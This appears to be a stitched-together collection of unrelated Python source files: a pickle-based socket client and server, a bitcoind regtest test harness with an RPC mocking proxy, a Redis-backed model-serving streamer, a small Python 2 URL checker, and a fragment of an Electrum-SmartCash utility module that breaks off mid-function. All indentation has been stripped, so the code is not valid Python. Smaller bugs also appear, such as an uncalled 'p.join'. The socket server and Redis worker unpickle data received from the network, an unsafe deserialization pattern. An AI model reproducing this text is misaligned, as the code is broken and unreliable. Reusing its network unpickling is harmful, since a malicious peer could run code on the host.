mes = None
if mes is not None:
self.onReceive(mes)
except:
print("Closing...")
self.connection.close()
raise ErrorDisconnectedFromServer
def _rec_forever(self):
assert self.connected
while True:
self._receive_once()
def connect(self):
assert not self.connected
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.connection.connect((str(self.ip), int(self.port)))
self.connected = True
except:
self.connected = False
self.connection = None
raise ErrorConnectingToServer
def send(self, data):
assert self.connected
wrapper = self._dict_wrapper(data)
dumped_wrapper = pickle.dumps(wrapper)
try:
x = str(len(dumped_wrapper)).encode().rjust(4, b'0')
#print("Client sent packet with length:", x)
self.connection.sendall(x + dumped_wrapper)
except:
raise ErrorSendingMessage
def start(self):
assert not self.connected
self.connect()
self.rec_thread = threading.Thread(target=self._rec_forever)
self.rec_thread.start()
class Server:
def __init__(self, port, onReceive=lambda x, y: None, _newthread_client=True):
self.port = port
self.ip = ''
self.started = False
self._clients = []
self._clientthreads = []
self.clients = []
self.onReceive = onReceive
self._newthread_client = True
def _handle_single(self, client):
while True:
numchars = client.recv(__HEADER_AMOUNT__)
if numchars == b'':
continue
#print("Server numchars recv len:", numchars)
numchars = int(numchars)
data = client.recv(numchars)
if not data == b'':
data = pickle.loads(data)
#print(data, type(data))
self.onReceive(data, self._clients)
def _handle_all(self):
clientmax = len(self._clients)
for client in range(clientmax):
try:
c = self._clients[client]
things = c.recv(__HEADER_AMOUNT__)
if things == b'':
continue
chars = int(things)
data = c.recv(chars)
#print("Number of characters:", chars)
if not data == b'':
data = pickle.loads(data)
self.onReceive(data, self._clients)
except Exception:
print("Handle-all got error")
def _handle_forever(self):
while True:
self._handle_all()
def _accept_once(self):
#print("before accept")
client, address = self.listener.accept()
self._clients.append(client)
print("Got client: %s" % client)
#print("after accept")
def _accept_forever(self):
while True:
self._accept_once()
def _accept_newthread_forever(self):
while True:
#print("newthread -- before accept")
client, address = self.listener.accept()
self._clients.append(client)
point = len(self._clientthreads)
print("Got client:", client)
self._clientthreads.append(threading.Thread(target=self._handle_single, args = (client, )))
self._clientthreads[point].start()
def start(self):
assert not self.started
self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listener.bind((self.ip, self.port))
self.listener.listen(5)
print("Server successfully created on port %s" % self.port)
if not self._newthread_client:
self.acceptThread = threading.Thread(target=self._accept_forever)
self.acceptThread.start()
self.handleThread = threading.Thread(target=self._handle_forever)
self.handleThread.start()
else:
self.acceptThread = threading.Thread(target=self._accept_newthread_forever)
self.acceptThread.start()
|
bitcoind.py
|
import decimal
import json
import logging
import os
import threading
from cheroot.wsgi import Server
from decimal import Decimal
from ephemeral_port_reserve import reserve
from flask import Flask, request, Response
from test_framework.authproxy import AuthServiceProxy, JSONRPCException
from test_framework.utils import TailableProc, wait_for, TIMEOUT, BITCOIND_PATH, COIN
class BitcoindRpcInterface:
def __init__(self, data_dir, network, rpc_port):
self.cookie_path = os.path.join(data_dir, network, ".cookie")
self.rpc_port = rpc_port
self.wallet_name = "revaultd-tests"
def __getattr__(self, name):
assert not (name.startswith("__") and name.endswith("__")), "Python internals"
with open(self.cookie_path) as fd:
authpair = fd.read()
service_url = (
f"http://{authpair}@localhost:{self.rpc_port}/wallet/{self.wallet_name}"
)
proxy = AuthServiceProxy(service_url, name)
def f(*args):
return proxy.__call__(*args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir, rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.p2pport = reserve()
self.prefix = "bitcoind"
regtestdir = os.path.join(bitcoin_dir, "regtest")
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
BITCOIND_PATH,
"-datadir={}".format(bitcoin_dir),
"-printtoconsole",
"-server",
]
bitcoind_conf = {
"port": self.p2pport,
"rpcport": rpcport,
"debug": 1,
"fallbackfee": Decimal(1000) / COIN,
"rpcthreads": 32,
}
self.conf_file = os.path.join(bitcoin_dir, "bitcoin.conf")
with open(self.conf_file, "w") as f:
f.write("chain=regtest\n")
f.write("[regtest]\n")
for k, v in bitcoind_conf.items():
f.write(f"{k}={v}\n")
self.rpc = BitcoindRpcInterface(bitcoin_dir, "regtest", rpcport)
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def stop(self):
self.rpc.stop()
return TailableProc.stop(self)
# wait_for_mempool can be used to wait for the mempool before generating
# blocks:
# True := wait for at least 1 transation
# int > 0 := wait for at least N transactions
# 'tx_id' := wait for one transaction id given as a string
# ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(
lambda: all(
txid in self.rpc.getrawmempool() for txid in wait_for_mempool
)
)
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
old_blockcount = self.rpc.getblockcount()
addr = self.rpc.getnewaddress()
self.rpc.generatetoaddress(numblocks, addr)
wait_for(lambda: self.rpc.getblockcount() == old_blockcount + numblocks)
def get_coins(self, amount_btc):
# subsidy halving is every 150 blocks on regtest, it's a rough estimate
# to avoid looping in most cases
numblocks = amount_btc // 25 + 1
while self.rpc.getbalance() < amount_btc:
self.generate_block(numblocks)
def generate_blocks_censor(self, n, txids):
"""Generate {n} blocks ignoring {txids}"""
fee_delta = 1000000
for txid in txids:
self.rpc.prioritisetransaction(txid, None, -fee_delta)
self.generate_block(n)
for txid in txids:
self.rpc.prioritisetransaction(txid, None, fee_delta)
def generate_empty_blocks(self, n):
"""Generate {n} empty blocks"""
addr = self.rpc.getnewaddress()
for _ in range(n):
self.rpc.generateblock(addr, [])
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height={height} and:
- If shift >=0:
- re-mine all mempool transactions into {height} + shift
(with shift floored at 1)
- Else:
- don't re-mine the mempool transactions
Note that tx's that become invalid at {height} (because coin maturity,
locktime etc.) are removed from mempool. The length of the new chain
will be original + 1 OR original + {shift}, whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1,
use {height}=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can
be pulled forward to h1.
2. Set {height}=h2 and {shift}= h1-h2
"""
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
if height + shift > orig_len:
final_len = height + shift
else:
final_len = 1 + orig_len
self.rpc.invalidateblock(old_hash)
self.wait_for_log(
r"InvalidChainFound: invalid block=.* height={}".format(height)
)
memp = self.rpc.getrawmempool()
if shift < 0:
self.generate_empty_blocks(1 + final_len - height)
elif shift == 0:
self.generate_block(1 + final_len - height, memp)
else:
self.generate_empty_blocks(shift)
self.generate_block(1 + final_len - (height + shift), memp)
self.wait_for_log(r"UpdateTip: new best=.* height={}".format(final_len))
def startup(self):
try:
self.start()
except Exception:
self.stop()
raise
info = self.rpc.getnetworkinfo()
if info["version"] < 220000:
self.rpc.stop()
raise ValueError(
"bitcoind is too old. Minimum supported version is 0.22.0."
" Current is {}".format(info["version"])
)
def cleanup(self):
try:
self.stop()
except Exception:
self.proc.kill()
self.proc.wait()
class DecimalEncoder(json.JSONEncoder):
"""By default json.dumps does not handle Decimals correctly, so we override its handling"""
def default(self, o):
if isinstance(o, decimal.Decimal):
return float(o)
return super(DecimalEncoder, self).default(o)
class BitcoindRpcProxy(object):
"""A proxy to the bitcoind RPC interface that can replace commands with arbitrary results.
Starts a HTTP server in a thread, listens for incoming JSONRPC requests, and responds with
either a mocked result or the result it got from bitcoind.
This was taken and adapted from the C-lightning test suite.
"""
def __init__(self, bitcoind_rpc_port, bitcoind_cookie_path, mocks):
self.app = Flask("BitcoindProxy")
self.app.add_url_rule(
"/",
"Entrypoint",
self.proxy,
methods=["POST"],
defaults={"path": ""},
)
self.app.add_url_rule(
"/<path:path>",
"Entrypoint",
self.proxy,
methods=["POST"],
)
self.rpcport = reserve()
# A mapping from method name to result as a dict.
# Eventually, the results could be callable.
self.mocks = mocks
self.bitcoind_rpc_port = bitcoind_rpc_port
self.bitcoind_cookie_path = bitcoind_cookie_path
self.start()
def __del__(self):
self.stop()
def _handle_request(self, r, path):
"""Handle a JSONRPC request {r} made to the HTTP endpoint {path} (to handle
wallet paths)"""
method = r["method"]
# If we have set a mock for this method reply with that
if method in self.mocks:
return {"id": r["id"], "error": None, "result": self.mocks[method]}
# Otherwise, just forward the request
with open(self.bitcoind_cookie_path) as fd:
authpair = fd.read()
service_url = f"http://{authpair}@localhost:{self.bitcoind_rpc_port}/{path}"
try:
res = AuthServiceProxy(service_url, r["method"])(*r["params"])
return {"result": res, "id": r["id"]}
except JSONRPCException as e:
return {"error": e.error, "id": r["id"]}
def proxy(self, path):
r = json.loads(request.data.decode("ASCII"))
if isinstance(r, list):
reply = [self._handle_request(subreq, path) for subreq in r]
else:
reply = self._handle_request(r, path)
# \r\n because rust-jsonrpc expects it..
response = Response(json.dumps(reply, cls=DecimalEncoder) + "\r\n")
response.headers["Content-Type"] = "application/json"
return response
def start(self):
self.server = Server(
("127.0.0.1", self.rpcport),
self.app,
numthreads=32,
request_queue_size=10,
accepted_queue_timeout=20,
timeout=TIMEOUT * 2,
)
self.proxy_thread = threading.Thread(target=self.server.start)
self.proxy_thread.daemon = True
self.proxy_thread.start()
# Now that bitcoind is running on the real rpcport, let's tell all
# future callers to talk to the proxyport. We use the bind_addr as a
# signal that the port is bound and accepting connections.
while self.server.bind_addr[1] == 0:
pass
self.rpcport = self.server.bind_addr[1]
def stop(self):
self.server.stop()
self.proxy_thread.join()
|
service_streamer.py
|
# coding=utf-8
# Created by Meteorix at 2019/7/13
import logging
import multiprocessing
import os
import threading
import time
import uuid
import weakref
import pickle
from queue import Queue, Empty
from typing import List
from redis import Redis
from .managed_model import ManagedModel
TIMEOUT = 1
TIME_SLEEP = 0.001
WORKER_TIMEOUT = 20
logger = logging.getLogger(__name__)
logger.setLevel("INFO")
mp = multiprocessing.get_context("spawn")
class Future(object):
def __init__(self, task_id, task_size, future_cache_ref):
self._id = task_id
self._size = task_size
self._future_cache_ref = future_cache_ref
self._outputs = []
self._finish_event = threading.Event()
def result(self, timeout=None):
if self._size == 0:
self._finish_event.set()
return []
finished = self._finish_event.wait(timeout)
if not finished:
raise TimeoutError("Task: %d Timeout" % self._id)
# remove from future_cache
future_cache = self._future_cache_ref()
if future_cache is not None:
del future_cache[self._id]
# [(request_id, output), ...] sorted by request_id
self._outputs.sort(key=lambda i: i[0])
# restore batch result from outputs
batch_result = [i[1] for i in self._outputs]
return batch_result
def done(self):
if self._finish_event.is_set():
return True
def _append_result(self, it_id, it_output):
self._outputs.append((it_id, it_output))
if len(self._outputs) >= self._size:
self._finish_event.set()
class _FutureCache(dict):
"Dict for weakref only"
pass
class _BaseStreamer(object):
def __init__(self, *args, **kwargs):
super().__init__()
self._client_id = str(uuid.uuid4())
self._task_id = 0
self._future_cache = _FutureCache() # {task_id: future}
self.back_thread = threading.Thread(target=self._loop_collect_result, name="thread_collect_result")
self.back_thread.daemon = True
def _delay_setup(self):
self.back_thread.start()
def _send_request(self, task_id, request_id, model_input):
raise NotImplementedError
def _recv_response(self, timeout=TIMEOUT):
raise NotImplementedError
def _input(self, batch: List) -> int:
"""
input a batch, distribute each item to mq, return task_id
"""
# task id in one client
task_id = self._task_id
self._task_id += 1
# request id in one task
request_id = 0
future = Future(task_id, len(batch), weakref.ref(self._future_cache))
self._future_cache[task_id] = future
for model_input in batch:
self._send_request(task_id, request_id, model_input)
request_id += 1
return task_id
def _loop_collect_result(self):
logger.info("start _loop_collect_result")
while True:
message = self._recv_response(timeout=TIMEOUT)
if message:
(task_id, request_id, item) = message
future = self._future_cache[task_id]
future._append_result(request_id, item)
else:
# todo
time.sleep(TIME_SLEEP)
def _output(self, task_id: int) -> List:
future = self._future_cache[task_id]
batch_result = future.result(WORKER_TIMEOUT)
return batch_result
def submit(self, batch):
task_id = self._input(batch)
future = self._future_cache[task_id]
return future
def predict(self, batch):
task_id = self._input(batch)
ret = self._output(task_id)
return ret
def destroy_workers(self):
raise NotImplementedError
class _BaseStreamWorker(object):
def __init__(self, predict_function, batch_size, max_latency, *args, **kwargs):
super().__init__()
assert callable(predict_function)
self._pid = os.getpid()
self._predict = predict_function
self._batch_size = batch_size
self._max_latency = max_latency
self._destroy_event = kwargs.get("destroy_event", None)
def run_forever(self, *args, **kwargs):
self._pid = os.getpid() # overwrite the pid
logger.info("[gpu worker %d] %s start working" % (self._pid, self))
while True:
handled = self._run_once()
if self._destroy_event and self._destroy_event.is_set():
break
if not handled:
# sleep if no data handled last time
time.sleep(TIME_SLEEP)
logger.info("[gpu worker %d] %s shutdown" % (self._pid, self))
def model_predict(self, batch_input):
batch_result = self._predict(batch_input)
return batch_result
def _run_once(self):
batch = []
start_time = time.time()
for i in range(self._batch_size):
try:
item = self._recv_request(timeout=self._max_latency)
except TimeoutError:
# each item timeout exceed the max latency
break
else:
batch.append(item)
if (time.time() - start_time) > self._max_latency:
# total batch time exceeds the max latency
break
if not batch:
return 0
model_inputs = [i[3] for i in batch]
model_outputs = self.model_predict(model_inputs)
# publish results to redis
for i, item in enumerate(batch):
client_id, task_id, request_id, _ = item
self._send_response(client_id, task_id, request_id, model_outputs[i])
batch_size = len(batch)
logger.info("[gpu worker %d] run_once batch_size: %d start_at: %s spend: %s" % (
self._pid, batch_size, start_time, time.time() - start_time))
return batch_size
def _recv_request(self, timeout=TIMEOUT):
raise NotImplementedError
def _send_response(self, client_id, task_id, request_id, model_input):
raise NotImplementedError
class ThreadedStreamer(_BaseStreamer):
def __init__(self, predict_function, batch_size, max_latency=0.1):
super().__init__()
self._input_queue = Queue()
self._output_queue = Queue()
self._worker_destroy_event=threading.Event()
self._worker = ThreadedWorker(predict_function, batch_size, max_latency,
self._input_queue, self._output_queue,
destroy_event=self._worker_destroy_event)
self._worker_thread = threading.Thread(target=self._worker.run_forever, name="thread_worker")
self._worker_thread.daemon = True
self._worker_thread.start()
self._delay_setup()
def _send_request(self, task_id, request_id, model_input):
self._input_queue.put((0, task_id, request_id, model_input))
def _recv_response(self, timeout=TIMEOUT):
try:
message = self._output_queue.get(timeout=timeout)
except Empty:
message = None
return message
def destroy_workers(self):
self._worker_destroy_event.set()
self._worker_thread.join(timeout=WORKER_TIMEOUT)
if self._worker_thread.is_alive():
raise TimeoutError("worker_thread destroy timeout")
logger.info("workers destroyed")
class ThreadedWorker(_BaseStreamWorker):
def __init__(self, predict_function, batch_size, max_latency, request_queue, response_queue, *args, **kwargs):
super().__init__(predict_function, batch_size, max_latency, *args, **kwargs)
self._request_queue = request_queue
self._response_queue = response_queue
def _recv_request(self, timeout=TIMEOUT):
try:
item = self._request_queue.get(timeout=timeout)
except Empty:
raise TimeoutError
else:
return item
def _send_response(self, client_id, task_id, request_id, model_output):
self._response_queue.put((task_id, request_id, model_output))
class Streamer(_BaseStreamer):
def __init__(self, predict_function_or_model, batch_size, max_latency=0.1, worker_num=1,
cuda_devices=None, model_init_args=None, model_init_kwargs=None):
super().__init__()
self.worker_num = worker_num
self.cuda_devices = cuda_devices
self._input_queue = mp.Queue()
self._output_queue = mp.Queue()
self._worker = StreamWorker(predict_function_or_model, batch_size, max_latency,
self._input_queue, self._output_queue,
model_init_args, model_init_kwargs)
self._worker_ps = []
self._worker_ready_events = []
self._worker_destroy_events = []
self._setup_gpu_worker()
self._delay_setup()
def _setup_gpu_worker(self):
for i in range(self.worker_num):
ready_event = mp.Event()
destroy_event = mp.Event()
if self.cuda_devices is not None:
gpu_id = self.cuda_devices[i % len(self.cuda_devices)]
args = (gpu_id, ready_event, destroy_event)
else:
args = (None, ready_event, destroy_event)
p = mp.Process(target=self._worker.run_forever, args=args, name="stream_worker", daemon=True)
p.start()
self._worker_ps.append(p)
self._worker_ready_events.append(ready_event)
self._worker_destroy_events.append(destroy_event)
def _wait_for_worker_ready(self, timeout=WORKER_TIMEOUT):
# wait for all workers finishing init
for (i, e) in enumerate(self._worker_ready_events):
# todo: select all events with timeout
is_ready = e.wait(timeout)
logger.info("gpu worker:%d ready state: %s" % (i, is_ready))
def _send_request(self, task_id, request_id, model_input):
self._input_queue.put((0, task_id, request_id, model_input))
def _recv_response(self, timeout=TIMEOUT):
try:
message = self._output_queue.get(timeout=timeout)
except Empty:
message = None
return message
def destroy_workers(self):
for e in self._worker_destroy_events:
e.set()
for p in self._worker_ps:
p.join(timeout=WORKER_TIMEOUT)
if p.is_alive():
raise TimeoutError("worker_process destroy timeout")
logger.info("workers destroyed")
class StreamWorker(_BaseStreamWorker):
def __init__(self, predict_function_or_model, batch_size, max_latency, request_queue, response_queue,
model_init_args, model_init_kwargs, *args, **kwargs):
super().__init__(predict_function_or_model, batch_size, max_latency, *args, **kwargs)
self._request_queue = request_queue
self._response_queue = response_queue
self._model_init_args = model_init_args or []
self._model_init_kwargs = model_init_kwargs or {}
def run_forever(self, gpu_id=None, ready_event=None, destroy_event=None):
# if it is a managed model, lazy init model after forked & set CUDA_VISIBLE_DEVICES
if isinstance(self._predict, type) and issubclass(self._predict, ManagedModel):
model_class = self._predict
logger.info("[gpu worker %d] init model on gpu:%s" % (os.getpid(), gpu_id))
self._model = model_class(gpu_id)
self._model.init_model(*self._model_init_args, **self._model_init_kwargs)
logger.info("[gpu worker %d] init model on gpu:%s" % (os.getpid(), gpu_id))
self._predict = self._model.predict
if ready_event:
ready_event.set() # tell father process that init is finished
if destroy_event:
self._destroy_event = destroy_event
super().run_forever()
def _recv_request(self, timeout=TIMEOUT):
try:
item = self._request_queue.get(timeout=timeout)
except Empty:
raise TimeoutError
else:
return item
def _send_response(self, client_id, task_id, request_id, model_output):
self._response_queue.put((task_id, request_id, model_output))
class RedisStreamer(_BaseStreamer):
"""
1. input batch as a task
2. distribute every single item in batch to redis
3. backend loop collecting results
3. output batch result for a task when every single item is returned
"""
def __init__(self, redis_broker="localhost:6379", prefix=''):
super().__init__()
self.prefix = prefix
self._redis_broker = redis_broker
self._redis = _RedisClient(self._client_id, self._redis_broker, self.prefix)
self._delay_setup()
def _send_request(self, task_id, request_id, model_input):
self._redis.send_request(task_id, request_id, model_input)
def _recv_response(self, timeout=TIMEOUT):
return self._redis.recv_response(timeout)
class RedisWorker(_BaseStreamWorker):
def __init__(self, model_class, batch_size, max_latency=0.1,
redis_broker="localhost:6379", prefix='',
model_init_args=None, model_init_kwargs=None, *args, **kwargs):
# assert issubclass(model_class, ManagedModel)
super().__init__(model_class, batch_size, max_latency, *args, **kwargs)
self.prefix = prefix
self._model_init_args = model_init_args or []
self._model_init_kwargs = model_init_kwargs or {}
self._redis_broker = redis_broker
self._redis = _RedisServer(0, self._redis_broker, self.prefix)
self._requests_queue = Queue()
self.back_thread = threading.Thread(target=self._loop_recv_request, name="thread_recv_request")
self.back_thread.daemon = True
self.back_thread.start()
def run_forever(self, gpu_id=None):
logger.info("[gpu worker %d] init model on gpu:%s" % (os.getpid(), gpu_id))
model_class = self._predict
self._model = model_class(gpu_id)
self._model.init_model(*self._model_init_args, **self._model_init_kwargs)
self._predict = self._model.predict
super().run_forever()
def _loop_recv_request(self):
logger.info("[gpu worker %d] start loop_recv_request" % (os.getpid()))
while True:
message = self._redis.recv_request(timeout=TIMEOUT)
if message:
(client_id, task_id, request_id, request_item) = pickle.loads(message)
self._requests_queue.put((client_id, task_id, request_id, request_item))
else:
# sleep if recv timeout
time.sleep(TIME_SLEEP)
def _recv_request(self, timeout=TIMEOUT):
try:
item = self._requests_queue.get(timeout=timeout)
except Empty:
raise TimeoutError
else:
return item
def _send_response(self, client_id, task_id, request_id, model_output):
self._redis.send_response(client_id, task_id, request_id, model_output)
def _setup_redis_worker_and_runforever(model_class, batch_size, max_latency, gpu_id, redis_broker, prefix=''):
redis_worker = RedisWorker(model_class, batch_size, max_latency, redis_broker=redis_broker, prefix=prefix)
redis_worker.run_forever(gpu_id)
def run_redis_workers_forever(model_class, batch_size, max_latency=0.1,
worker_num=1, cuda_devices=None, redis_broker="localhost:6379",
prefix='', model_init_args=None, model_init_kwargs=None):
procs = []
for i in range(worker_num):
if cuda_devices is not None:
gpu_id = cuda_devices[i % len(cuda_devices)]
else:
gpu_id = None
args = [model_class, batch_size, max_latency, gpu_id, redis_broker, prefix]
p = mp.Process(target=_setup_redis_worker_and_runforever, args=args, name="stream_worker", daemon=True)
p.start()
procs.append(p)
for p in procs:
p.join()
class _RedisAgent(object):
def __init__(self, redis_id, redis_broker='localhost:6379', prefix=''):
self._redis_id = redis_id
self._redis_host = redis_broker.split(":")[0]
self._redis_port = int(redis_broker.split(":")[1])
self._redis_request_queue_name = "request_queue" + prefix
self._redis_response_pb_prefix = "response_pb_" + prefix
self._redis = Redis(host=self._redis_host, port=self._redis_port)
self._response_pb = self._redis.pubsub(ignore_subscribe_messages=True)
self._setup()
def _setup(self):
raise NotImplementedError
def _response_pb_name(self, redis_id):
return self._redis_response_pb_prefix + redis_id
class _RedisClient(_RedisAgent):
def _setup(self):
self._response_pb.subscribe(self._response_pb_name(self._redis_id))
def send_request(self, task_id, request_id, model_input):
message = (self._redis_id, task_id, request_id, model_input)
self._redis.lpush(self._redis_request_queue_name, pickle.dumps(message))
def recv_response(self, timeout):
message = self._response_pb.get_message(timeout=timeout)
if message:
return pickle.loads(message["data"])
class _RedisServer(_RedisAgent):
def _setup(self):
# server subscribe all pubsub
self._response_pb.psubscribe(self._redis_response_pb_prefix + "*")
def recv_request(self, timeout):
message = self._redis.blpop(self._redis_request_queue_name, timeout=timeout)
# (queue_name, data)
if message:
return message[1]
def send_response(self, client_id, task_id, request_id, model_output):
message = (task_id, request_id, model_output)
channel_name = self._response_pb_name(client_id)
self._redis.publish(channel_name, pickle.dumps(message))
|
multipro-1.py
|
#/usr/bin/env python
#coding=utf8
"""
# Author: kellanfan
# Created Time : Tue 18 Jul 2017 08:32:38 PM CST
# File Name: multipro-1.py
# Description:
"""
import os, urllib2
from multiprocessing import Process
urllist = ['http://www.jianshu.com/u/347ae48e48e3', 'https://stackedit.io/', 'http://man.chinaunix.net/develop/rfc/RFC4.txt', 'http://dockone.io/', 'http://theme-next.iissnan.com/']
def getcode(url):
header = {
'user-agent': ('Mozilla/5.0 (Windows NT 6.2; WOW64)'
'AppleWebKit/537.36 (KHTML, like Gecko)'
'Chrome/56.0.2924.87 Safari/537.36'),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
}
req = urllib2.Request(url, headers = header)
code = urllib2.urlopen(req).getcode()
print '[\033[1;32m%s\033[0m] is ok, process is [\033[1;35m%s\033[0m]' %(url, os.getpid())
print 'Parent process %s.' % os.getpid()
for url in urllist:
p = Process(target=getcode,args=(url,))
p.start()
p.join
|
util.py
|
# Electrum - Lightweight SmartCash Client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'SMART':8, 'mSMART':5, 'uSMART':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
# Raised when importing a key that's already in the wallet.
class AlreadyHaveAddress(Exception):
def __init__(self, msg, addr):
super(AlreadyHaveAddress, self).__init__(msg)
self.addr = addr
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " SMART"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
